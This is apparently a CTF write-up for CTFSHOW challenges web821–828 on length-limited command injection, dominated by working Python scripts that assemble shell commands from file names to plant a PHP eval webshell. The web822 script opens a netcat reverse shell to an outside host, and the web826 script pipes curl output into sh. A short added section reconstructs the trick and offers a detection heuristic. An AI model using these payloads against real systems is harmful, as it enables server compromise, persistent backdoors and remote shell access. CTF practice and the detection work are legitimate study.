CTFSHOW Common Techniques (821-830)
2022-06-13 04:20:00 【yu22x】
For this part I am really just a script porter.
web821
Have a look at this article first: https://www.cnblogs.com/-chenxs/p/11981586.html
With a length limit like this, you create files whose names are the pieces of the command you want to run, then write the names, sorted by time, into another file: ls -t >0
Finally execute 0: sh 0
Using the script the group owner posted in the VIP group:
```python
import requests
import time

url = "http://ddfe46fa-fa05-4675-bb00-537e95a0f936.challenge.ctf.show/"

# Each entry is one POST to cmd=...; ">name" creates an empty file called "name".
# Names ending in "\" become line continuations once the listing is run by sh,
# so ls -t (newest first) joins the fragments back into one command.
payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]

def writeFile(payload):
    data = {"cmd": payload}
    requests.post(url, data=data)

def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create " + p.strip())
        time.sleep(1)  # keep mtimes distinct so ls -t orders the names reliably

def check():
    response = requests.get(url + "1.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + url + "1.php")

def main():
    run()
    check()

if __name__ == '__main__':
    main()
```
The file that gets written contains <?php eval($_GET[1]);
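To see the web821 mechanism (the same assembly is reused in web825 to web827) from the responder's side, here is an added example that is not part of the original post or the group owner's script: given the sequence of cmd values recovered from the POST bodies in a web server log, it reproduces the file names the shell would create, the order ls -t would list them in, the single command sh would run after joining the backslash-continued lines, and a simple heuristic that flags this request pattern. The sample cmd list, the helper names and the regexes are constructed for this example.

```python
import re
import base64

# Constructed sample: the cmd values sent by web821's script, in send order. A responder
# would recover the same sequence from the POST bodies in the web server's access log.
WEB821_CMDS = [
    ">hp", ">1.p\\", ">d\\>\\", ">\\ -\\", ">e64\\", ">bas\\", ">7\\|\\",
    ">XSk\\", ">Fsx\\", ">dFV\\", ">kX0\\", ">bCg\\", ">XZh\\", ">AgZ\\",
    ">waH\\", ">PD9\\", ">o\\ \\", ">ech\\", "ls -t>0", ". 0",
]

def unquote(word):
    """sh backslash quoting: '\\x' yields 'x'; a backslash at the very end stays."""
    out, i = [], 0
    while i < len(word):
        if word[i] == "\\" and i + 1 < len(word):
            out.append(word[i + 1])
            i += 2
        else:
            out.append(word[i])
            i += 1
    return "".join(out)

def created_files(cmds):
    """Names created by bare '>name' commands, in creation order (one per request)."""
    return [unquote(c[1:]) for c in cmds if c.startswith(">") and len(c) > 1]

def assembled_script(cmds, preexisting=("index.php",)):
    """Contents of the file written by 'ls -t>f': the redirect creates f first, so f
    heads the list, then the attacker's names newest-first, then the older files."""
    target = [m.group(1) for m in (re.match(r"ls\s*-t\s*>\s*(\S+)", c) for c in cmds) if m]
    return "\n".join(target + list(reversed(created_files(cmds))) + list(preexisting)) + "\n"

def commands_run(script):
    """Lines sh actually executes: backslash-newline joins lines, then split."""
    return [line for line in script.replace("\\\n", "").split("\n") if line]

def decoded_payload(cmd):
    """If the command pipes a base64 literal into 'base64 -d', return the decoded text."""
    m = re.search(r"echo(?:\s+|\$\{IFS\})(\S+?)\s*\|\s*base64 -d", cmd)
    return base64.b64decode(m.group(1)).decode() if m else None

def flag_fragment_chain(cmds, min_fragments=8):
    """Detection heuristic: many short '>name\\' creates, then a listing (ls -t or dir),
    then execution of a file via sh or '.'; this shape is the fingerprint of the trick."""
    frags = sum(1 for c in cmds if c.startswith(">") and c.endswith("\\"))
    listed = any(re.match(r"\s*(ls\s*-t|dir\b)", c) for c in cmds)
    executed = any(re.match(r"\s*(sh|\.)\s+\S", c) for c in cmds)
    return frags >= min_fragments and listed and executed
```

The heuristic only looks at the shape of the request sequence, so it also catches the web825 variant where the listing is produced by dir instead of ls -t, while the reconstruction models only the direct ls -t case.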
web822
The web directory is not writable, so the file is written to the temp directory instead and executed from there.
One trick from the no-letters-no-digits RCE category can be used here: PHP keeps an uploaded file under /tmp for the duration of the request, and a glob is enough to source it.
```python
#coding:utf-8
#author yu22x
import requests

url = "http://dbea52c2-0b83-4770-972d-7adde3dc1677.challenge.ctf.show/"
#files={'file':'bash -i >& /dev/tcp/ip/port 0>&1'}
# The uploaded file lands as /tmp/phpXXXXXX while the request runs;
# '. /t*/*' sources it through the glob, so no file name is needed.
files = {'file': 'nc ip port -e /bin/sh'}
r = requests.post(url, files=files, data={'cmd': '. /t*/*'})
html = r.text
print(html)
```
The bash reverse shell did not work for me, so I used the nc one.
web 823|824
I have to admire the group owner's imagination.
First, look at the payload:
```python
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
```
Create the files grep and h.
Then run * > j;
since the glob expands in alphabetical order, what actually executes is grep h index.php,
which gives every line of index.php that contains an h. The result:
```php
<?php
# @Author: h1xa
# @Last Modified by: h1xa
# @email: [email protected]
# @link: https://ctfer.com
highlight_file(__FILE__);
shell_exec($cmd);
```
Next, the contents of j are appended after index.php and the whole thing is written into i: cat * >> i
Finally i is copied over index.php.
This only applies in a limited number of cases, though: the command you ultimately need to call must contain an h or a p.
```python
# @Author: h1xa
import requests
import time

url = "http://6763f093-a4c6-48a8-9740-018b234da289.challenge.ctf.show/"

# Every command relies on the glob "*" expanding in alphabetical order, so the
# file names created by ">name" become the arguments of the real command.
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]

def writeFile(payload):
    data = {"cmd": payload}
    requests.post(url, data=data)

def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create " + p.strip())
        time.sleep(0.3)
    print("[*] Attack success!!!Webshell is " + url)

def main():
    run()

if __name__ == '__main__':
    main()
```
web825
The principle is the same as in 821, but because the length limit is shorter, identical file names come up: the space, for example, may be needed in several places, yet a file with that name can only be created once.
So the space has to be replaced with ${IFS}.
One last problem: the ls -t>0 we used before is longer than 5 characters, so another method is needed.
Here dir is used:
dir a b >c writes the names a and b into the file c, and rev then turns that listing into the ls -t command we need.
For the details see https://www.sohu.com/a/208155480_354899
```python
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time

url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"

# First block: build the "ls -tk >j" command via dir and rev (sh x).
# Second block: the command fragments, joined by ls -t into j and run by sh j.
payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]

def writeFile(payload):
    data = {"cmd": payload}
    requests.post(url, data=data)

def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create " + p.strip())
        time.sleep(0.3)

def check():
    response = requests.get(url + "a.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + url + "a.php")

def main():
    run()
    check()

if __name__ == '__main__':
    main()
```
web826
```python
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time

url = "http://d6373b16-848d-4656-9a30-d1fbb18d8678.challenge.ctf.show/"
#url="http://101.34.94.44/aaa/index.php"

# First block: build "ls -t>a" out of a sorted ls listing (mv, cat, sh z).
# Second block: the fragments of a curl|sh command, assembled by ls -t into a.
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
# The IP here is written as a decimal integer, because a normal dotted address
# would contain several dots.
# It can be converted with this site: https://tool.520101.com/wangluo/jinzhizhuanhuan/
'>sh',
'>\\|\\',
'>00\\',
'>80\\',
'>\\:\\',
'>48\\',
'>11\\',
'>75\\',
'>96\\',
'>16\\',
'>\\ \\',
'>rl\\',
'>cu\\',
'sh z',
'sh a',
]

def writeFile(payload):
    data = {"cmd": payload}
    requests.post(url, data=data)

def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create " + p.strip())
        time.sleep(1)

def check():
    response = requests.get(url + "1.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + url + "1.php")

def main():
    run()
    check()

if __name__ == '__main__':
    main()
```
web827
```python
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time

url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"

# Same ls/mv/cat bootstrap as web826, followed by the web825 fragments that
# write the webshell to a.php.
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh z',
'sh a'
]

def writeFile(payload):
    data = {"cmd": payload}
    requests.post(url, data=data)

def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create " + p.strip())
        time.sleep(1)

def check():
    response = requests.get(url + "a.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + url + "a.php")

def main():
    run()
    check()

if __name__ == '__main__':
    main()
```
web828
There is a ready-made payload online: https://juejin.cn/post/7069307571483443231